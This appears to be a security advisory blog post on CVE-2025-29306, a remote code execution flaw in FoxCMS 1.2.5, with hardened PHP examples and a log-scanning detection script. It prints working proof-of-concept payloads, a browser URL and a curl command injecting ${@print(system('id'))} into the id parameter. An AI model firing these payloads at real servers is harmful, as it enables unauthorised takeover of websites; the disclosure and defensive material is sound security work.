CVE-2025-29306 – Unauthenticated Remote Code Execution in FoxCMS v1.2.5 via Unserialize Injection

Research & Tutorials

Jul 3, 2025


Discover details about CVE-2025-29306, a critical RCE vulnerability in FoxCMS 1.2.5. Learn how unsafe use of PHP’s unserialize() function enables remote attackers to execute arbitrary system commands.

OffSec Team


Overview

CVE-2025-29306 is a critical remote code execution (RCE) vulnerability affecting FoxCMS version 1.2.5. The flaw stems from unsafe handling of the id parameter, which is passed directly into PHP’s unserialize() function without validation. Attackers can supply malicious serialized PHP objects that trigger arbitrary command execution via system().

  • CVE ID: CVE-2025-29306
  • Severity: Critical
  • CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
  • EPSS Score: 71.52%
  • Affected Version: FoxCMS ≤ 1.2.5
  • Patched Version: None released as of writing
  • Authentication Required: No
  • Impact: Remote Code Execution

Technical Breakdown

FoxCMS uses unserialize() directly on user-supplied input from the id parameter. When a malicious serialized PHP object is supplied, FoxCMS inadvertently executes attacker-controlled PHP code.

A typical payload might inject PHP code such as:

${@print_r(@system("id"))}

When deserialized and evaluated, this results in arbitrary OS command execution. This technique is known as PHP Object Injection (POI), leveraging unserialize() as the initial injection vector.
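The following is an added illustration and not FoxCMS source code: a hypothetical request handler showing the unsafe pattern described above (a user-supplied string passed straight to unserialize()) next to two hardened forms. The class and function names are invented for the demo, the serialized probe string is constructed, and PHP 8 is assumed.

```php
<?php
// Added example (not FoxCMS code): the unsafe unserialize() pattern beside
// hardened alternatives. Class and function names are hypothetical.

// Hypothetical application class with a magic method. unserialize() will
// instantiate ANY class the caller names and run its __wakeup(); here the
// method only announces itself so the demo stays inert.
class LogWriter
{
    public string $path = '/tmp/app.log';

    public function __wakeup(): void
    {
        echo "  [!] LogWriter::__wakeup() ran inside unserialize(), path={$this->path}\n";
    }
}

// VULNERABLE: the raw id parameter goes straight into unserialize().
function lookupCaseVulnerable(string $id): mixed
{
    return unserialize($id);
}

// HARDENED (preferred): id is an integer record key, so validate it as one
// and never deserialize it at all.
function lookupCaseHardened(string $id): ?int
{
    return ctype_digit($id) ? (int) $id : null;
}

// HARDENED (for legacy serialized data that must still be read): forbid object
// instantiation so no constructor or magic method can run. Any object in the
// blob becomes a __PHP_Incomplete_Class placeholder. JSON (json_decode) is
// safer still because it has no object-instantiation semantics at all.
function safeUnserialize(string $blob): mixed
{
    return unserialize($blob, ['allowed_classes' => false]);
}

// Constructed probe: a serialized LogWriter object used only for this demo.
$probe = 'O:9:"LogWriter":1:{s:4:"path";s:8:"/tmp/x.x";}';

echo "vulnerable handler:\n";
$obj = lookupCaseVulnerable($probe);
echo "  got " . (is_object($obj) ? get_class($obj) : gettype($obj)) . "\n";

echo "allowed_classes=false:\n";
$safe = safeUnserialize($probe);
echo "  got " . get_class($safe) . " (no magic method executed)\n";

echo "integer validation:\n";
var_dump(lookupCaseHardened($probe)); // NULL: rejected outright
var_dump(lookupCaseHardened('42'));   // int(42)
```

Run with `php demo.php`: the vulnerable path prints the __wakeup() line and reports a live LogWriter instance, the allowed_classes=false path reports __PHP_Incomplete_Class with no method executed, and the integer validator rejects the probe. The first fix (never deserialize what should be an integer) is the one that actually removes the bug class; allowed_classes is a containment measure for code that cannot drop unserialize() immediately.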


Conditions for Exploitation

  • FoxCMS v1.2.5 installed and publicly reachable
  • No login or authentication required
  • PHP deserialization gadgets available in the environment
  • PHP has shell access (default in many configurations)

Exploitation Steps

To compromise this lab, an attacker crafts a POST request to the vulnerable case display page, injecting PHP code that is subsequently written to a .php file.

Simple Browser PoC

A known exploit simply calls phpinfo(). Replace TARGET with the target’s hostname or IP; visiting the URL reveals the full phpinfo() output, confirming code execution.

http://TARGET/images/index.html?id=${@print(phpinfo())}

PoC with curl

Swap out phpinfo() for an OS command, e.g. id:

curl "http://TARGET/images/index.html?id=%24%7B%40print%28system%28%22id%22%29%29%7D"

This confirms the vulnerability and demonstrates remote code execution via unserialize-based injection in FoxCMS v1.2.5.


Mitigation

  • No official patch exists yet. Users should:
    • Remove or replace unserialize() usage with safer methods (e.g. JSON decoding)
    • Filter or validate all input parameters
    • Block public access to vulnerable pages
    • Deploy WAF signatures to detect serialized payloads
    • Disable dangerous PHP functions like system() if not needed
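As an added example of the log review or WAF signature step above (not code from FoxCMS or OffSec), the script below scans web-server access log lines for the two payload shapes this advisory describes: the ${@func(...)} curly-syntax injection seen in the PoC URLs, and a serialized PHP object in a query parameter. The log lines are constructed for the demo; the regular expressions are the part a practitioner would carry into a WAF rule or SIEM query.

```php
<?php
// Added example (not FoxCMS code): offline review of access-log lines for the
// payload shapes described in the advisory. Log lines are constructed.

// Constructed access-log lines (combined log format).
$constructedLogLines = [
    '10.0.0.5 - - [03/Jul/2025:10:00:01 +0000] "GET /images/index.html?id=42 HTTP/1.1" 200 512',
    '10.0.0.7 - - [03/Jul/2025:10:00:03 +0000] "GET /images/index.html?id=%24%7B%40print%28phpinfo%28%29%29%7D HTTP/1.1" 200 9120',
    '10.0.0.9 - - [03/Jul/2025:10:00:09 +0000] "GET /images/index.html?id=O%3A3%3A%22Foo%22%3A1%3A%7Bs%3A1%3A%22x%22%3Bi%3A1%3B%7D HTTP/1.1" 200 300',
];

$patterns = [
    // ${@func(...)} or ${func(...)}: the curly-syntax code injection from the PoC
    'curly-syntax PHP code injection'    => '/\$\{\s*@?[A-Za-z_]\w*\s*\(/',
    // O:<len>:"Class":<n>:{ ... } is a serialized PHP object (C: is the legacy
    // Serializable form). Serialized arrays a:<n>:{ are left out as too noisy.
    'serialized PHP object in parameter' => '/\b[OC]:\d+:"[^"]+":\d+:\{/',
];

// Returns one finding per matching request: client IP, reason, decoded query.
function flagSuspiciousRequests(array $lines, array $patterns): array
{
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match('/^(\S+) .*?"(?:GET|POST) (\S+) HTTP\//', $line, $m)) {
            continue; // not a request line we understand
        }
        [, $client, $target] = $m;
        $query = (string) (parse_url($target, PHP_URL_QUERY) ?: '');
        // Decode twice so a double-encoded payload is still seen in the clear.
        $decoded = urldecode(urldecode($query));
        foreach ($patterns as $reason => $regex) {
            if (preg_match($regex, $decoded)) {
                $hits[] = ['client' => $client, 'reason' => $reason, 'query' => $decoded];
                break; // one finding per request is enough
            }
        }
    }
    return $hits;
}

foreach (flagSuspiciousRequests($constructedLogLines, $patterns) as $hit) {
    printf("%-10s %-36s %s\n", $hit['client'], $hit['reason'], $hit['query']);
}
```

Running it flags the second and third lines and leaves the plain `id=42` request alone. Decoding before matching matters: the PoC on this page is URL-encoded, so a rule that matches only the literal `${` or `O:` on the raw request line will miss it. Match on the decoded parameter value, and treat a hit on a parameter that is supposed to be an integer as a high-confidence signal.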
